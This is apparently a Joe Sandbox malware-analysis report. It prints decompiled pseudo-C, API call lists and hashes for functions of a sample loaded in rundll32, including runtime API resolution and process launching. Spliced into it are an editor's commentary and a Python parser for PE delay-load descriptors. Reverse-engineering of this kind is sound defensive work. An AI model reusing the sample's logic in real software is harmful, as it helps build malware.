                                                    • Part of subcall function 052D8307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,052DA428,?,073095B0), ref: 052D8332
                                                    • Part of subcall function 052D8307: lstrlen.KERNEL32(?,?,?,052DA428,?,073095B0), ref: 052D833A
                                                    • Part of subcall function 052D8307: strcpy.NTDLL ref: 052D8351
                                                    • Part of subcall function 052D8307: lstrcat.KERNEL32(00000000,?), ref: 052D835C
                                                    • Part of subcall function 052D8307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,052DA428,?,073095B0), ref: 052D8379
                                                  • StrTrimA.SHLWAPI(00000000,052DC2AC,?,073095B0), ref: 052D8D2C
                                                    • Part of subcall function 052D3CC8: lstrlen.KERNEL32(073087FA,00000000,00000000,74ECC740,052DA453,00000000), ref: 052D3CD8
                                                    • Part of subcall function 052D3CC8: lstrlen.KERNEL32(?), ref: 052D3CE0
                                                    • Part of subcall function 052D3CC8: lstrcpy.KERNEL32(00000000,073087FA), ref: 052D3CF4
                                                    • Part of subcall function 052D3CC8: lstrcat.KERNEL32(00000000,?), ref: 052D3CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 052D8D4D
                                                  • lstrcpy.KERNEL32(?,?), ref: 052D8D55
                                                  • lstrcat.KERNEL32(?,?), ref: 052D8D63
                                                  • lstrcat.KERNEL32(?,00000000), ref: 052D8D69
                                                    • Part of subcall function 052D809F: lstrlen.KERNEL32(?,00000000,052DD330,00000001,052D2200,052DD00C,052DD00C,00000000,00000005,00000000,00000000,?,?,?,052D96C1,052D23E9), ref: 052D80A8
                                                    • Part of subcall function 052D809F: mbstowcs.NTDLL ref: 052D80CF
                                                    • Part of subcall function 052D809F: memset.NTDLL ref: 052D80E1
                                                  • wcstombs.NTDLL ref: 052D8DFC
                                                    • Part of subcall function 052D163F: SysAllocString.OLEAUT32(?), ref: 052D1680
                                                    • Part of subcall function 052D9039: HeapFree.KERNEL32(00000000,00000000,052D7F18,00000000,?,?,00000000), ref: 052D9045
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 052D8E3D
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 052D8E49
                                                  • HeapFree.KERNEL32(00000000,?,?,073095B0), ref: 052D8E55
                                                  • HeapFree.KERNEL32(00000000,?), ref: 052D8E61
                                                  • HeapFree.KERNEL32(00000000,?), ref: 052D8E6D
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                   • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                   • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                   • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                   • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                  • String ID:
                                                  • API String ID: 3748877296-0
                                                  • Opcode ID: 16b1cd24a3c71a7cef9dcd08d421b1d3add5130276369ea2765b2d547d2329e6
                                                  • Instruction ID: 4b8632ad8e9b82da67adb427685a443ae12e14b40d22ed70a087c3810820a51e
                                                  • Opcode Fuzzy Hash: 16b1cd24a3c71a7cef9dcd08d421b1d3add5130276369ea2765b2d547d2329e6
                                                  • Instruction Fuzzy Hash: BC913971911209AFCB11DFA8EC89AAABFB9EF48361F144055F809E72A0DB31D951DF70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 51%
                                                   			/* Decompiled MSVC CRT delay-load import helper (the __delayLoadHelper2 pattern):
                                                   			   compiler runtime code linked into the sample, not sample-specific logic, so an
                                                   			   analyst can move on once the shape below is recognised. The field and constant
                                                   			   identification is the editor's reading of this listing, not something the
                                                   			   report itself states.
                                                   			   _a4 -> ImgDelayDescr, all fields RVAs relative to image base 0x052D0000:
                                                   			     [0] grAttrs, [1] rvaDLLName, [2] rvaHmod, [3] rvaIAT, [4] rvaINT,
                                                   			     [5] rvaBoundIAT, [6] rvaUnloadIAT, [7] dwTimeStamp
                                                   			   _a8 -> address of the IAT slot whose thunk triggered this call.
                                                   			   0x52dd1a0 / 0x52dd19c hold __pfnDliNotifyHook2 / __pfnDliFailureHook2;
                                                   			   _v72 (cb = 0x24) is the DelayLoadInfo passed to those hooks with codes
                                                   			   dliStartProcessing=0, dliNotePreLoadLibrary=1, dliNotePreGetProcAddress=2,
                                                   			   dliFailLoadLib=3, dliFailGetProc=4, dliNoteEndProcessing=5.
                                                   			   0xC06D0057 / 0xC06D007E / 0xC06D007F are VcppException() of
                                                   			   ERROR_INVALID_PARAMETER / ERROR_MOD_NOT_FOUND / ERROR_PROC_NOT_FOUND. */
                                                   			E052DADE5(long _a4, long _a8) {
                                                   				signed int _v8;
                                                   				intOrPtr _v16;
                                                   				LONG* _v28;
                                                   				long _v40;
                                                   				long _v44;
                                                   				long _v48;
                                                   				CHAR* _v52;
                                                   				long _v56;
                                                   				CHAR* _v60;
                                                   				long _v64;
                                                   				signed int* _v68;
                                                   				char _v72;
                                                   				signed int _t76;
                                                   				signed int _t80;
                                                   				signed int _t81;
                                                   				intOrPtr* _t82;
                                                   				intOrPtr* _t83;
                                                   				intOrPtr* _t85;
                                                   				intOrPtr* _t90;
                                                   				intOrPtr* _t95;
                                                   				intOrPtr* _t98;
                                                   				void* _t102;
                                                   				intOrPtr* _t104;
                                                   				void* _t115;
                                                   				long _t116;
                                                   				void _t125;
                                                   				void* _t131;
                                                   				signed short _t133;
                                                   				struct HINSTANCE__* _t138;
                                                   				signed int* _t139;
                                                   
                                                   				_t139 = _a4;
                                                   				_v28 = _t139[2] + 0x52d0000; // &cached HMODULE (rvaHmod)
                                                   				_t115 = _t139[3] + 0x52d0000; // IAT
                                                   				_t131 = _t139[4] + 0x52d0000; // INT (import name table)
                                                   				_v8 = _t139[7]; // dwTimeStamp of the DLL the bound IAT was built against
                                                   				_v60 = _t139[1] + 0x52d0000; // DLL name
                                                   				_v16 = _t139[5] + 0x52d0000; // bound IAT
                                                   				_v64 = _a8;
                                                   				_v72 = 0x24; // DelayLoadInfo.cb
                                                   				_v68 = _t139; // DelayLoadInfo.pidd
                                                   				_v56 = 0;
                                                   				asm("stosd");
                                                   				_v48 = 0;
                                                   				_v44 = 0;
                                                   				_v40 = 0;
                                                   				if(( *_t139 & 0x00000001) == 0) { // grAttrs without dlattrRva: old VA-based descriptor, refuse
                                                   					_a8 =  &_v72;
                                                   					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                   					return 0;
                                                   				}
                                                   				_t138 =  *_v28; // cached HMODULE, 0 until the DLL has been loaded once
                                                   				_t76 = _a8 - _t115 >> 2 << 2; // byte offset of the IAT slot, aligned to 4
                                                   				_t133 =  *(_t131 + _t76); // matching INT entry
                                                   				_a4 = _t76;
                                                   				_t80 =  !(_t133 >> 0x1f) & 0x00000001; // bit 31 clear -> import by name
                                                   				_v56 = _t80; // dlp.fImportByName
                                                   				_t81 = _t133 + 0x52d0002; // IMAGE_IMPORT_BY_NAME.Name (skips the 2-byte Hint)
                                                   				if(_t80 == 0) {
                                                   					_t81 = _t133 & 0x0000ffff; // ordinal
                                                   				}
                                                   				_v52 = _t81; // dlp.szProcName or dlp.dwOrdinal
                                                   				_t82 =  *0x52dd1a0; // 0x0 (__pfnDliNotifyHook2)
                                                   				_t116 = 0;
                                                   				if(_t82 == 0) {
                                                   					L6:
                                                   					if(_t138 != 0) {
                                                   						L18:
                                                   						_t83 =  *0x52dd1a0; // 0x0
                                                   						_v48 = _t138;
                                                   						if(_t83 != 0) {
                                                   							_t116 =  *_t83(2,  &_v72); // dliNotePreGetProcAddress: hook may return the address itself
                                                   						}
                                                   						if(_t116 != 0) {
                                                   							L32:
                                                   							 *_a8 = _t116; // patch the IAT slot so later calls bypass this helper
                                                   							L33:
                                                   							_t85 =  *0x52dd1a0; // 0x0
                                                   							if(_t85 != 0) {
                                                   								_v40 = _v40 & 0x00000000;
                                                   								_v48 = _t138;
                                                   								_v44 = _t116;
                                                   								 *_t85(5,  &_v72); // dliNoteEndProcessing
                                                   							}
                                                   							return _t116;
                                                   						} else {
                                                   							if(_t139[5] == _t116 || _t139[7] == _t116) { // no bound IAT or no timestamp: resolve by name/ordinal
                                                   								L27:
                                                   								_t116 = GetProcAddress(_t138, _v52);
                                                   								if(_t116 == 0) {
                                                   									_v40 = GetLastError();
                                                   									_t90 =  *0x52dd19c; // 0x0 (__pfnDliFailureHook2)
                                                   									if(_t90 != 0) {
                                                   										_t116 =  *_t90(4,  &_v72); // dliFailGetProc
                                                   									}
                                                   									if(_t116 == 0) {
                                                   										_a4 =  &_v72;
                                                   										RaiseException(0xc06d007f, _t116, 1,  &_a4); // ERROR_PROC_NOT_FOUND
                                                   										_t116 = _v44;
                                                   									}
                                                   								}
                                                   								goto L32;
                                                   							} else {
                                                   								// bound IAT is trusted only if the loaded module has the expected
                                                   								// FILE_HEADER.TimeDateStamp (+8) and sits at its preferred ImageBase (+0x34)
                                                   								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138; // e_lfanew -> "PE\0\0"
                                                   								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                   									_t116 =  *(_a4 + _v16); // pre-resolved address from the bound IAT
                                                   									if(_t116 != 0) {
                                                   										goto L32;
                                                   									}
                                                   								}
                                                   								goto L27;
                                                   							}
                                                   						}
                                                   					}
                                                   					_t98 =  *0x52dd1a0; // 0x0
                                                   					if(_t98 == 0) {
                                                   						L9:
                                                   						_t138 = LoadLibraryA(_v60);
                                                   						if(_t138 != 0) {
                                                   							L13:
                                                   							// publish the HMODULE; if another thread already stored it, drop our extra reference
                                                   							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                   								FreeLibrary(_t138);
                                                   							} else {
                                                   								if(_t139[6] != 0) { // rvaUnloadIAT present: register on the unload list (__puiHead at 0x52dd198)
                                                   									_t102 = LocalAlloc(0x40, 8);
                                                   									if(_t102 != 0) {
                                                   										 *(_t102 + 4) = _t139;
                                                   										_t125 =  *0x52dd198; // 0x0
                                                   										 *_t102 = _t125;
                                                   										 *0x52dd198 = _t102;
                                                   									}
                                                   								}
                                                   							}
                                                   							goto L18;
                                                   						}
                                                   						_v40 = GetLastError();
                                                   						_t104 =  *0x52dd19c; // 0x0 (__pfnDliFailureHook2)
                                                   						if(_t104 == 0) {
                                                   							L12:
                                                   							_a8 =  &_v72;
                                                   							RaiseException(0xc06d007e, 0, 1,  &_a8); // ERROR_MOD_NOT_FOUND
                                                   							return _v44;
                                                   						}
                                                   						_t138 =  *_t104(3,  &_v72); // dliFailLoadLib: hook may supply a replacement HMODULE
                                                   						if(_t138 != 0) {
                                                   							goto L13;
                                                   						}
                                                   						goto L12;
                                                   					}
                                                   					_t138 =  *_t98(1,  &_v72); // dliNotePreLoadLibrary: hook may supply the HMODULE
                                                   					if(_t138 != 0) {
                                                   						goto L13;
                                                   					}
                                                   					goto L9;
                                                   				}
                                                   				_t116 =  *_t82(0,  &_v72); // dliStartProcessing: hook may short-circuit with a resolved address
                                                   				if(_t116 != 0) {
                                                   					goto L33;
                                                   				}
                                                   				goto L6;
                                                   			}
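                                                   The helper above walks the delay-load descriptor, decides per IAT slot whether the INT entry names a function or an ordinal, and only trusts the bound IAT when the loaded module's timestamp and base match. The following is an added example, not code from the report or from the analysed sample: a stand-alone parser for the same ImgDelayDescr layout and the same ordinal/name and bound-IAT decisions, run over a constructed in-memory 32-bit image fragment. The descriptor offsets, the DLL name "USER32.dll", the function name "wsprintfA", the ordinal 542 and the timestamp value are all made up for the test image.

```python
"""Parse a PE delay-load descriptor (ImgDelayDescr) from a *mapped* 32-bit image.

Added example; the sample image below is constructed, not taken from the analysed DLL.
"""
import struct

DLATTR_RVA = 0x1                 # grAttrs bit: descriptor fields are RVAs (VC7+ layout)
IMAGE_ORDINAL_FLAG32 = 0x80000000
_DESCR_FIELDS = ("grAttrs", "rvaDLLName", "rvaHmod", "rvaIAT", "rvaINT",
                 "rvaBoundIAT", "rvaUnloadIAT", "dwTimeStamp")


def parse_delay_descriptor(image: bytes, rva: int) -> dict:
    """Eight little-endian DWORDs, in the order the decompiled helper indexes them."""
    return dict(zip(_DESCR_FIELDS, struct.unpack_from("<8I", image, rva)))


def read_cstr(image: bytes, rva: int) -> str:
    return image[rva:image.index(b"\x00", rva)].decode("ascii")


def resolve_int_entry(image: bytes, entry: int):
    """Ordinal-vs-name test on one INT entry: bit 31 set -> ordinal in the low 16 bits,
    otherwise the entry is the RVA of an IMAGE_IMPORT_BY_NAME whose Name follows a 2-byte Hint."""
    if entry & IMAGE_ORDINAL_FLAG32:
        return ("ordinal", entry & 0xFFFF)
    return ("name", read_cstr(image, entry + 2))


def delay_imports(image: bytes, descr_rva: int):
    """Return (dll_name, [(iat_slot_rva, kind, name_or_ordinal), ...]) for one descriptor."""
    d = parse_delay_descriptor(image, descr_rva)
    if not d["grAttrs"] & DLATTR_RVA:
        # the helper raises 0xC06D0057 (ERROR_INVALID_PARAMETER) for VA-based descriptors
        raise ValueError("descriptor without dlattrRva is not supported")
    dll = read_cstr(image, d["rvaDLLName"])
    slots = []
    offset = 0
    while True:
        (entry,) = struct.unpack_from("<I", image, d["rvaINT"] + offset)
        if entry == 0:                      # INT is NULL-terminated
            break
        slots.append((d["rvaIAT"] + offset,) + resolve_int_entry(image, entry))
        offset += 4
    return dll, slots


def use_bound_iat(descr_timestamp: int, module_timestamp: int,
                  module_base: int, preferred_base: int) -> bool:
    """The helper's bound-IAT shortcut: the pre-resolved address is used only when the
    loaded module has the descriptor's TimeDateStamp and was not relocated."""
    return descr_timestamp == module_timestamp and module_base == preferred_base


def build_sample_image() -> bytes:
    """Constructed 4 KiB image fragment: descriptor at 0x200, DLL name at 0x300,
    hmod slot at 0x340, IAT at 0x380, INT at 0x400, IMAGE_IMPORT_BY_NAME at 0x500."""
    img = bytearray(0x1000)
    struct.pack_into("<8I", img, 0x200, DLATTR_RVA, 0x300, 0x340, 0x380, 0x400, 0, 0, 0x5F3A1C22)
    name = b"USER32.dll\x00"
    img[0x300:0x300 + len(name)] = name
    struct.pack_into("<3I", img, 0x400, 0x500, IMAGE_ORDINAL_FLAG32 | 542, 0)
    struct.pack_into("<H", img, 0x500, 0x0123)          # Hint
    func = b"wsprintfA\x00"
    img[0x502:0x502 + len(func)] = func
    return bytes(img)


if __name__ == "__main__":
    dll, slots = delay_imports(build_sample_image(), 0x200)
    print(dll, slots)
```

The parser assumes a mapped image (RVAs usable as offsets), which is what the helper sees at run time and what a process memory dump like the one this listing came from gives you; on a file from disk the RVAs must first be translated through the section table.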

                                                   Instruction addresses (per-line address column of the listing above, flattened by extraction; the line-to-address pairing is not recoverable): 0x052dadf4 .. 0x052db017

                                                  APIs
                                                  • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 052DAE5E
                                                  • LoadLibraryA.KERNEL32(?), ref: 052DAEDB
                                                  • GetLastError.KERNEL32 ref: 052DAEE7
                                                  • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 052DAF1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                   • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                   • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                   • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                   • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                  • String ID: $
                                                  • API String ID: 948315288-3993045852
                                                  • Opcode ID: 17aef45074b3f28909aed6ebdd333be6747d9161352a2a0b09e8b0a3b03dded5
                                                  • Instruction ID: 79a1f8a98ccd4ac2a4a7a43b05af40a9116ce4a3152d24d8c41f78cddad12a3e
                                                  • Opcode Fuzzy Hash: 17aef45074b3f28909aed6ebdd333be6747d9161352a2a0b09e8b0a3b03dded5
                                                  • Instruction Fuzzy Hash: 228119B1A21606AFDB10CF98D885EADFBF5FF48311F148169E509E7280EB71E945CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 27%
                                                  			E052D816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				long _v16;
                                                  				intOrPtr _v20;
                                                  				signed int _v24;
                                                  				void* __esi;
                                                  				long _t43;
                                                  				intOrPtr _t44;
                                                  				intOrPtr _t46;
                                                  				void* _t48;
                                                  				void* _t49;
                                                  				void* _t50;
                                                  				intOrPtr _t54;
                                                  				intOrPtr _t57;
                                                  				void* _t58;
                                                  				void* _t59;
                                                  				void* _t60;
                                                  				intOrPtr _t66;
                                                  				void* _t71;
                                                  				void* _t74;
                                                  				intOrPtr _t75;
                                                  				void* _t77;
                                                  				intOrPtr _t79;
                                                  				intOrPtr* _t80;
                                                  				intOrPtr _t91;
                                                  
                                                  				_t79 =  *0x52dd33c; // 0x7309bc8
                                                  				_v24 = 8;
                                                  				_t43 = GetTickCount();
                                                  				_push(5);
                                                  				_t74 = 0xa;
                                                  				_v16 = _t43;
                                                  				_t44 = E052D70F5(_t74,  &_v16);
                                                  				_v8 = _t44;
                                                  				if(_t44 == 0) {
                                                  					_v8 = 0x52dc1ac;
                                                  				}
                                                  				_t46 = E052D8022(_t79);
                                                  				_v12 = _t46;
                                                  				if(_t46 != 0) {
                                                  					_t80 = __imp__;
                                                  					_t48 =  *_t80(_v8, _t71);
                                                  					_t49 =  *_t80(_v12);
                                                  					_t50 =  *_t80(_a4);
                                                  					_t54 = E052D2049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                  					_v20 = _t54;
                                                  					if(_t54 != 0) {
                                                  						_t75 =  *0x52dd27c; // 0x202a5a8
                                                  						_t16 = _t75 + 0x52deb28; // 0x530025
                                                  						 *0x52dd11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                  						_push(4);
                                                  						_t77 = 5;
                                                  						_t57 = E052D70F5(_t77,  &_v16);
                                                  						_v8 = _t57;
                                                  						if(_t57 == 0) {
                                                  							_v8 = 0x52dc1b0;
                                                  						}
                                                  						_t58 =  *_t80(_v8);
                                                  						_t59 =  *_t80(_v12);
                                                  						_t60 =  *_t80(_a4);
                                                  						_t91 = E052D2049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                  						if(_t91 == 0) {
                                                  							E052D9039(_v20);
                                                  						} else {
                                                  							_t66 =  *0x52dd27c; // 0x202a5a8
                                                  							_t31 = _t66 + 0x52dec48; // 0x73006d
                                                  							 *0x52dd11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                  							 *_a16 = _v20;
                                                  							_v24 = _v24 & 0x00000000;
                                                  							 *_a20 = _t91;
                                                  						}
                                                  					}
                                                  					E052D9039(_v12);
                                                  				}
                                                  				return _v24;
                                                  			}

                                                  Instruction addresses (one per decompiled statement, in listing order):
                                                  0x052d8174 0x052d817a 0x052d8181 0x052d8187 0x052d818b 0x052d818f 0x052d8192 0x052d8199
                                                  0x052d819c 0x052d819e 0x052d819e 0x052d81a7 0x052d81ae 0x052d81b1 0x052d81b7 0x052d81c1
                                                  0x052d81ca 0x052d81d1 0x052d81ea 0x052d81f1 0x052d81f4 0x052d81fd 0x052d8206 0x052d8217
                                                  0x052d8220 0x052d8224 0x052d8228 0x052d822f 0x052d8232 0x052d8234 0x052d8234 0x052d823e
                                                  0x052d8247 0x052d824e 0x052d8266 0x052d826a 0x052d82a7 0x052d826c 0x052d826f 0x052d8277
                                                  0x052d8288 0x052d8294 0x052d829c 0x052d82a0 0x052d82a0 0x052d826a 0x052d82af 0x052d82b4
                                                  0x052d82bb

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 052D8181
                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 052D81C1
                                                  • lstrlen.KERNEL32(00000000), ref: 052D81CA
                                                  • lstrlen.KERNEL32(00000000), ref: 052D81D1
                                                  • lstrlenW.KERNEL32(80000002), ref: 052D81DE
                                                  • lstrlen.KERNEL32(?,00000004), ref: 052D823E
                                                  • lstrlen.KERNEL32(?), ref: 052D8247
                                                  • lstrlen.KERNEL32(?), ref: 052D824E
                                                  • lstrlenW.KERNEL32(?), ref: 052D8255
                                                    • Part of subcall function 052D9039: HeapFree.KERNEL32(00000000,00000000,052D7F18,00000000,?,?,00000000), ref: 052D9045
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CountFreeHeapTick
                                                  • String ID:
                                                  • API String ID: 2535036572-0
                                                  • Opcode ID: fcc3bbccc02300355ad05fb1363663f48f7d32d0a9d8b7e4f5f8cb12312dca94
                                                  • Instruction ID: 8ac60854be0a06c0343135ffd52c3ebbfeca0293e1a7a7d5a1e54d7ee1378a2f
                                                  • Opcode Fuzzy Hash: fcc3bbccc02300355ad05fb1363663f48f7d32d0a9d8b7e4f5f8cb12312dca94
                                                  • Instruction Fuzzy Hash: 60412372D10219FBDF11AFA4DC09A9EBBB5EF48314F054061F904A7261DB369A15EBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 73%
                                                  			E052D205E(void* __eax, void* __ecx) {
                                                  				long _v8;
                                                  				char _v12;
                                                  				void* _v16;
                                                  				void* _v28;
                                                  				long _v32;
                                                  				void _v104;
                                                  				char _v108;
                                                  				long _t36;
                                                  				intOrPtr _t40;
                                                  				intOrPtr _t47;
                                                  				intOrPtr _t50;
                                                  				void* _t58;
                                                  				void* _t68;
                                                  				intOrPtr* _t70;
                                                  				intOrPtr* _t71;
                                                  
                                                  				_t1 = __eax + 0x14; // 0x74183966
                                                  				_t69 =  *_t1;
                                                  				_t36 = E052D692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                  				_v8 = _t36;
                                                  				if(_t36 != 0) {
                                                  					L12:
                                                  					return _v8;
                                                  				}
                                                  				E052DA8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                  				_t40 = _v12(_v12);
                                                  				_v8 = _t40;
                                                  				if(_t40 == 0 && ( *0x52dd260 & 0x00000001) != 0) {
                                                  					_v32 = 0;
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					_v108 = 0;
                                                  					memset( &_v104, 0, 0x40);
                                                  					_t47 =  *0x52dd27c; // 0x202a5a8
                                                  					_t18 = _t47 + 0x52de3e6; // 0x73797325
                                                  					_t68 = E052D95B1(_t18);
                                                  					if(_t68 == 0) {
                                                  						_v8 = 8;
                                                  					} else {
                                                  						_t50 =  *0x52dd27c; // 0x202a5a8
                                                  						_t19 = _t50 + 0x52de747; // 0x7308cef
                                                  						_t20 = _t50 + 0x52de0af; // 0x4e52454b
                                                  						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                  						if(_t71 == 0) {
                                                  							_v8 = 0x7f;
                                                  						} else {
                                                  							_v108 = 0x44;
                                                  							E052D84D5();
                                                  							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                  							_push(1);
                                                  							E052D84D5();
                                                  							if(_t58 == 0) {
                                                  								_v8 = GetLastError();
                                                  							} else {
                                                  								CloseHandle(_v28);
                                                  								CloseHandle(_v32);
                                                  							}
                                                  						}
                                                  						HeapFree( *0x52dd238, 0, _t68);
                                                  					}
                                                  				}
                                                  				_t70 = _v16;
                                                  				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                  				E052D9039(_t70);
                                                  				goto L12;
                                                  			}

                                                  Instruction addresses (one per decompiled statement, in listing order):
                                                  0x052d2066 0x052d2066 0x052d2075 0x052d207e 0x052d2081 0x052d218e 0x052d2195 0x052d2195
                                                  0x052d2090 0x052d2098 0x052d209d 0x052d20a0 0x052d20b5 0x052d20bb 0x052d20bc 0x052d20bf
                                                  0x052d20c5 0x052d20c8 0x052d20cd 0x052d20d5 0x052d20e1 0x052d20e5 0x052d2175 0x052d20eb
                                                  0x052d20eb 0x052d20f0 0x052d20f7 0x052d210b 0x052d210f 0x052d215e 0x052d2111 0x052d2112
                                                  0x052d2119 0x052d2132 0x052d2134 0x052d2138 0x052d213f 0x052d2159 0x052d2141 0x052d214a
                                                  0x052d214f 0x052d214f 0x052d213f 0x052d216d 0x052d216d 0x052d20e5 0x052d217c 0x052d2185
                                                  0x052d2189 0x00000000

                                                  APIs
                                                    • Part of subcall function 052D692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,052D207A,?,00000001,?,?,00000000,00000000), ref: 052D6951
                                                    • Part of subcall function 052D692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 052D6973
                                                    • Part of subcall function 052D692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 052D6989
                                                    • Part of subcall function 052D692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 052D699F
                                                    • Part of subcall function 052D692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 052D69B5
                                                    • Part of subcall function 052D692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 052D69CB
                                                  • memset.NTDLL ref: 052D20C8
                                                    • Part of subcall function 052D95B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,052D23E9,63699BCE,052D1354,73797325), ref: 052D95C2
                                                    • Part of subcall function 052D95B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 052D95DC
                                                  • GetModuleHandleA.KERNEL32(4E52454B,07308CEF,73797325), ref: 052D20FE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 052D2105
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 052D216D
                                                    • Part of subcall function 052D84D5: GetProcAddress.KERNEL32(36776F57,052D21E5), ref: 052D84F0
                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 052D214A
                                                  • CloseHandle.KERNEL32(?), ref: 052D214F
                                                  • GetLastError.KERNEL32(00000001), ref: 052D2153
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                  • String ID:
                                                  • API String ID: 3075724336-0
                                                  • Opcode ID: 64b86911d89ecdf97ad7ed6596ad98e4feece084b41fd63a2a77f7c5d6fcd689
                                                  • Instruction ID: 31f13b6fe970a8801359d175b7e5ae9022918216079124c2629df99827a6b431
                                                  • Opcode Fuzzy Hash: 64b86911d89ecdf97ad7ed6596ad98e4feece084b41fd63a2a77f7c5d6fcd689
                                                  • Instruction Fuzzy Hash: 883117B6D10209FFDB10AFA4D889DAEBBBDAF08254F008469F606A7151DB74AD45CB70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 63%
                                                  			E052D8307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _t9;
                                                  				intOrPtr _t13;
                                                  				char* _t28;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				char* _t36;
                                                  				intOrPtr* _t40;
                                                  				char* _t41;
                                                  				char* _t42;
                                                  				char* _t43;
                                                  
                                                  				_t34 = __edx;
                                                  				_push(__ecx);
                                                  				_t9 =  *0x52dd27c; // 0x202a5a8
                                                  				_t1 = _t9 + 0x52de62c; // 0x253d7325
                                                  				_t36 = 0;
                                                  				_t28 = E052D9401(__ecx, _t1);
                                                  				if(_t28 != 0) {
                                                  					_t40 = __imp__;
                                                  					_t13 =  *_t40(_t28);
